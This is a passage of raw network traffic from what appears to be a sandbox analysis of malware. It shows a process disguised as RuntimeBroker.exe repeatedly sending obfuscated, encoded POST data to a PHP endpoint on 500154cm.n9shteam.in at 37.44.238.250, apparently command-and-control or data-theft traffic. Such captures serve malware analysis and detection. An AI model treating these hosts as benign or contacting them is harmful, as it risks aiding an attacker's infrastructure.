                                                                                                            116 | 192.168.2.4 | 50123 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:49.128282070 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:49.479324102 CET | 2512 | OUT | Data Raw: 51 56 5b 5f 56 5e 5c 5a 5c 58 5a 51 50 5c 58 51 5b 55 5e 5e 55 59 5a 5b 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV[_V^\Z\XZQP\XQ[U^^UYZ[__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'- 5=+)5<*'C4Y6^<)6(=$-=%% 3*<%&[!"^.1
                                                                                                            Nov 12, 2024 00:43:49.712791920 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:49.792721987 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:49 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            117 | 192.168.2.4 | 50124 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:49.919897079 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:50.276292086 CET | 2512 | OUT | Data Raw: 54 5f 5b 5f 56 5d 5c 58 5c 58 5a 51 50 5e 58 5d 5b 51 5e 5d 55 59 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_[_V]\X\XZQP^X][Q^]UYZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':0*-T!<5'/!84)#X6;*$>5\*540)]+5&[!"^.9
                                                                                                            Nov 12, 2024 00:43:50.516762972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:50.595385075 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:50 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            118 | 192.168.2.4 | 50125 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:50.729865074 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:51.088709116 CET | 2512 | OUT | Data Raw: 51 54 5b 55 53 5f 5c 5e 5c 58 5a 51 50 5b 58 5c 5b 50 5e 5d 55 55 5a 58 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[US_\^\XZQP[X\[P^]UUZX__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-32=V5<'5+(#9"5T05>C& <%&[!"^.-
                                                                                                            Nov 12, 2024 00:43:51.313759089 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:51.389118910 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:51 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            119 | 192.168.2.4 | 50126 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:51.739566088 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:52.088771105 CET | 2512 | OUT | Data Raw: 51 53 5e 56 56 51 59 5c 5c 58 5a 51 50 5f 58 53 5b 57 5e 5c 55 54 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS^VVQY\\XZQP_XS[W^\UTZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.!>]2"!'C8^6V*3.^5)U0>>=&"X49<%&[!"^.=
                                                                                                            Nov 12, 2024 00:43:52.325294018 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:52.404751062 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:52 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            120 | 192.168.2.4 | 50127 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:52.557544947 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:52.916996956 CET | 2512 | OUT | Data Raw: 54 55 5b 57 56 5e 59 5f 5c 58 5a 51 50 53 58 56 5b 52 5e 5c 55 59 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TU[WV^Y_\XZQPSXV[R^\UYZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'- >R5.D$%+!<)&!9Q%=-\*61#3=Z+%&[!"^.
                                                                                                            Nov 12, 2024 00:43:53.143841982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:53.220634937 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:53 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            121 | 192.168.2.4 | 50128 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:53.341979980 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            122 | 192.168.2.4 | 50129 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:53.621718884 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1820
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:53.982417107 CET | 1820 | OUT | Data Raw: 51 56 5b 51 56 5e 59 53 5c 58 5a 51 50 58 58 53 5b 52 5e 58 55 58 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV[QV^YS\XZQPXXS[R^XUXZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.01*(:!,>3C4X!;<U=#!!T%.")&2[7&(%&[!"^.!
                                                                                                            Nov 12, 2024 00:43:54.205719948 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:54.281959057 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:54 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 21 54 2a 3d 27 5a 21 02 2b 09 2e 3d 26 56 31 09 23 02 28 28 30 5c 22 00 1a 11 2f 0d 0b 1d 20 2d 2c 5d 30 29 35 5f 34 06 26 08 28 28 21 5b 05 12 22 03 34 02 3c 12 2b 3c 20 12 3a 31 23 5e 35 30 2b 14 2d 5f 30 0d 2a 2a 25 10 24 2c 3a 1e 24 31 3c 5b 2d 00 22 17 2b 06 2b 57 21 1e 2e 55 0b 11 20 08 33 16 3c 0d 20 01 2c 01 31 3e 2c 55 21 2e 22 53 26 03 20 1d 26 04 28 05 31 08 31 03 32 31 22 5e 25 2a 08 06 3d 5f 2f 5b 25 2a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: !T*='Z!+.=&V1#((0\"/ -,]0)5_4&((!["4<+< :1#^50+-_0**%$,:$1<[-"++W!.U 3< ,1>,U!."S& &(1121"^%*=_/[%*#Q-/V=[W


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            123 | 192.168.2.4 | 50130 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:53.705888033 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:54.058872938 CET | 2512 | OUT | Data Raw: 51 53 5e 53 56 51 5c 59 5c 58 5a 51 50 5d 58 51 5b 52 5e 50 55 59 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS^SVQ\Y\XZQP]XQ[R^PUYZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':>"9305(*%5^>$=6*C&\4*)%&[!"^.
                                                                                                            Nov 12, 2024 00:43:54.289213896 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:54.365844965 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:54 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            124 | 192.168.2.4 | 50131 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:54.498725891 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:54.854325056 CET | 2512 | OUT | Data Raw: 54 5f 5e 54 56 50 59 53 5c 58 5a 51 50 5d 58 53 5b 55 5e 5e 55 5b 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_^TVPYS\XZQP]XS[U^^U[Z___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\']- )9W!<6B%56^;*)"Q$->=%.40^(&[!"^.
                                                                                                            Nov 12, 2024 00:43:55.066576004 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:55.143735886 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:54 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            125 | 192.168.2.4 | 50132 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:55.290868044 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:55.636113882 CET | 2512 | OUT | Data Raw: 51 53 5b 5f 56 5b 59 5c 5c 58 5a 51 50 5c 58 5d 5b 57 5e 5a 55 5e 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[_V[Y\\XZQP\X][W^ZU^Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-0Z=;T6<)'5 X6;;*#5!5P3>6=%4#!](&[!"^.1
                                                                                                            Nov 12, 2024 00:43:55.881203890 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:55.954498053 CET  158  IN  HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:55 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                            126  192.168.2.4  50133  37.44.238.250  80  4076  C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                            Nov 12, 2024 00:43:56.075836897 CET  316  OUT  POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:56.433320045 CET  2512  OUT  Data Raw: 51 52 5e 52 56 58 59 5e 5c 58 5a 51 50 5e 58 50 5b 53 5e 5a 55 5d 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR^RVXY^\XZQP^XP[S^ZU]ZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-6]=U!Z='%([!W>3-!(6'.)C"[ 0<%&[!"^.9
                                                                                                            Nov 12, 2024 00:43:56.807518005 CET  1236  OUT  Data Raw: 51 52 5e 52 56 58 59 5e 5c 58 5a 51 50 5e 58 50 5b 53 5e 5a 55 5d 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR^RVXY^\XZQP^XP[S^ZU]ZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-6]=U!Z='%([!W>3-!(6'.)C"[ 0<%&[!"^.9
                                                                                                            Nov 12, 2024 00:43:57.313374996 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:57.314399958 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:57.315325975 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:57.317109108 CET  1276  OUT  Data Raw: 3a 5d 26 16 33 00 22 2a 02 26 22 10 3a 09 14 05 2b 56 5a 5f 3f 5b 04 21 25 01 00 18 3d 2c 10 28 34 03 16 2a 33 06 3d 21 00 2e 06 1a 03 55 04 34 28 3c 20 3c 39 05 58 12 02 5b 1b 3c 27 31 58 08 30 16 2f 5f 35 58 44 1a 00 32 51 15 3e 32 09 24 38 39
                                                                                                            Data Ascii: :]&3"*&":+VZ_?[!%=,(4*3=!.U4(< <9X[<'1X0/_5XD2Q>2$892.><Q=!12881^7/:?1\<W'9>,/%/<+-51Y."V4[+9+9=8)?X!>5(:(+P<_<;%0^2U<>('9#][#7%=:-*81>=5<<10Y]9,";9_3&_'.R+!=
                                                                                                            Nov 12, 2024 00:43:57.558734894 CET  158  IN  HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:57 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                            127  192.168.2.4  50134  37.44.238.250  80  4076  C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                            Nov 12, 2024 00:43:57.706549883 CET  316  OUT  POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:58.057652950 CET  2504  OUT  Data Raw: 54 51 5b 53 53 58 59 5f 5c 58 5a 51 50 5a 58 55 5b 51 5e 5f 55 55 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TQ[SSXY_\XZQPZXU[Q^_UUZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X..=*6"D'5'!)#&[!=P0=\)" 3!])5&[!"^.-
                                                                                                            Nov 12, 2024 00:43:58.291938066 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:58.377825022 CET  158  IN  HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:58 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                            128  192.168.2.4  50135  37.44.238.250  80  4076  C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                            Nov 12, 2024 00:43:58.496963978 CET  316  OUT  POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:58.854425907 CET  2512  OUT  Data Raw: 54 50 5b 53 56 51 59 5f 5c 58 5a 51 50 5d 58 56 5b 54 5e 5f 55 5d 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
